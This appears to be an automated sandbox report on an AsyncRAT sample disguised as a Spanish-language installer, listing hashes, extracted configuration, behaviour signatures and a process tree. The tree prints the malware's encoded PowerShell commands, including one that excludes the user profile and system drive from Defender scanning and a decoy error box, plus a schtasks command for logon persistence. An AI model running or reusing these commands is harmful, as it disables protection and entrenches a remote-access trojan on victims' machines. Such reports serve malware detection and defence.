Analysis
-
max time kernel
66s -
max time network
67s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-es -
resource tags
arch:x64arch:x86image:win10v2004-20250410-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
20/04/2025, 00:15
Behavioral task
behavioral1
Sample
Instaladores/evasor/extras/ejecutores/exe original/PEinstall.exe
Resource
win10v2004-20250410-es
Behavioral task
behavioral2
Sample
Instaladores/evasor/extras/ejecutores/inperfecto/PEInstaller.exe
Resource
win10v2004-20250314-es
Behavioral task
behavioral3
Sample
Instaladores/evasor/extras/ejecutores/inperfecto/installer.exe
Resource
win10v2004-20250410-es
Behavioral task
behavioral4
Sample
Instaladores/evasor/install.exe
Resource
win10v2004-20250314-es
Behavioral task
behavioral5
Sample
Instaladores/launcher.exe
Resource
win10v2004-20250314-es
General
-
Target
Instaladores/evasor/extras/ejecutores/exe original/PEinstall.exe
-
Size
57KB
-
MD5
ea80d619808889ea8edb799056a67bc1
-
SHA1
de591d83c5e24498a294366205d0a12d2098385c
-
SHA256
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9
-
SHA512
d7e43ccd9a2f4f0d959d49ddc089a90da4e7e00cde0480c849d5078cf6127d5a15f4229067170399e6722a574b43f2121f9cbc8b34768b844583adacaff07929
-
SSDEEP
1536:KERi5rR21kXfc3dLnUAfUgc2vZnmHYUTmu1ycX9D:3RV6EpUgcTmu1ycX9D
Malware Config
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:2009
jc1XWfeoz50P
-
delay
10
-
install
true
-
install_file
executor.exe
-
install_folder
%Temp%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000800000002420f-23.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation PEinstall.exe Key value queried \REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation PEInstaller.exe -
Executes dropped EXE 2 IoCs
pid Process 2172 PEInstaller.exe 3064 executor.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PEInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language executor.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3884 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2792 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 5972 powershell.exe 5972 powershell.exe 4920 powershell.exe 4920 powershell.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe 2172 PEInstaller.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 5972 powershell.exe Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 2172 PEInstaller.exe Token: SeDebugPrivilege 3064 executor.exe Token: SeDebugPrivilege 3064 executor.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2988 wrote to memory of 5972 2988 PEinstall.exe 85 PID 2988 wrote to memory of 5972 2988 PEinstall.exe 85 PID 2988 wrote to memory of 4920 2988 PEinstall.exe 92 PID 2988 wrote to memory of 4920 2988 PEinstall.exe 92 PID 2988 wrote to memory of 2172 2988 PEinstall.exe 94 PID 2988 wrote to memory of 2172 2988 PEinstall.exe 94 PID 2988 wrote to memory of 2172 2988 PEinstall.exe 94 PID 2172 wrote to memory of 4340 2172 PEInstaller.exe 104 PID 2172 wrote to memory of 4340 2172 PEInstaller.exe 104 PID 2172 wrote to memory of 4340 2172 PEInstaller.exe 104 PID 2172 wrote to memory of 1364 2172 PEInstaller.exe 106 PID 2172 wrote to memory of 1364 2172 PEInstaller.exe 106 PID 2172 wrote to memory of 1364 2172 PEInstaller.exe 106 PID 1364 wrote to memory of 3884 1364 cmd.exe 108 PID 1364 wrote to memory of 3884 1364 cmd.exe 108 PID 1364 wrote to memory of 3884 1364 cmd.exe 108 PID 4340 wrote to memory of 2792 4340 cmd.exe 109 PID 4340 wrote to memory of 2792 4340 cmd.exe 109 PID 4340 wrote to memory of 2792 4340 cmd.exe 109 PID 1364 wrote to memory of 3064 1364 cmd.exe 110 PID 1364 wrote to memory of 3064 1364 cmd.exe 110 PID 1364 wrote to memory of 3064 1364 cmd.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\Instaladores\evasor\extras\ejecutores\exe original\PEinstall.exe"C:\Users\Admin\AppData\Local\Temp\Instaladores\evasor\extras\ejecutores\exe original\PEinstall.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcgBmACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAcgBlACAAdwBhAHMAIABhAG4AIABlAHIAcgBvAHIAIABlAHgAZQBjAHUAdABpAG4AZwAgAHQAaABpAHMAIABwAHIAbwBnAHIAYQBtAC4AIABDAG8AbgB0AGEAYwB0ACAAdABoAGUAIABhAHUAdABoAG8AcgAgAGYAbwByACAAbQBvAHIAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB4AG0AYwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAYQBzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Users\Admin\AppData\Roaming\PEInstaller.exe"C:\Users\Admin\AppData\Roaming\PEInstaller.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp925D.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3884
-
-
C:\Users\Admin\AppData\Local\Temp\executor.exe"C:\Users\Admin\AppData\Local\Temp\executor.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD57d74f37c0cc75e4bba0b73f1516e1d20
SHA13be42abed4c70d2a6349e986f692faffa1b7af13
SHA25680ceefcaf435ff95b3ed9e7e8ce7fa4144c3870bc0c2eaabe09c778e3827bbe1
SHA512f63852814a1bf32e4aaa5778488b04087df5952ce85d0a0502c012c2fbab87d62c9eddbfd17f027a8627c6fa41761682f33183619a91af978ed30155cca530a9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
155B
MD52724cc58e5f2c548434bd96106a38761
SHA1becc7ff5dcd720dcef33fb39ac6a0ee17c6f37be
SHA2566698448a86780ae8993d5bdce82b83e8ce23a773c4650a3f2f94234a9f0aef9b
SHA512fd3f6b74a4ff35643a0f0bf8ffb7d503778f0c06e7145419682809b34ffe48e18082bdf1356bef8743e3a791c7472ec4afd6d1008ecbaa9f6964faa3de2a8bf6
-
Filesize
48KB
MD5a96ef57452d73871dc1045b96fddcf96
SHA17a9b28306b0fc32d4281b756be5bc91f53234696
SHA2562fd4684b115a4b607493596b7fba4d54ddc7d97aec1852fbd60d449f353c2902
SHA51214db2977907baa98fe81f66fc0b44d360bee92d8b5e53527021fd9ef5f182e3aaa30e5e05ef95b0eac3d09b21074e89dee42c59d8a23b91a3dfa0c4871c3cd8e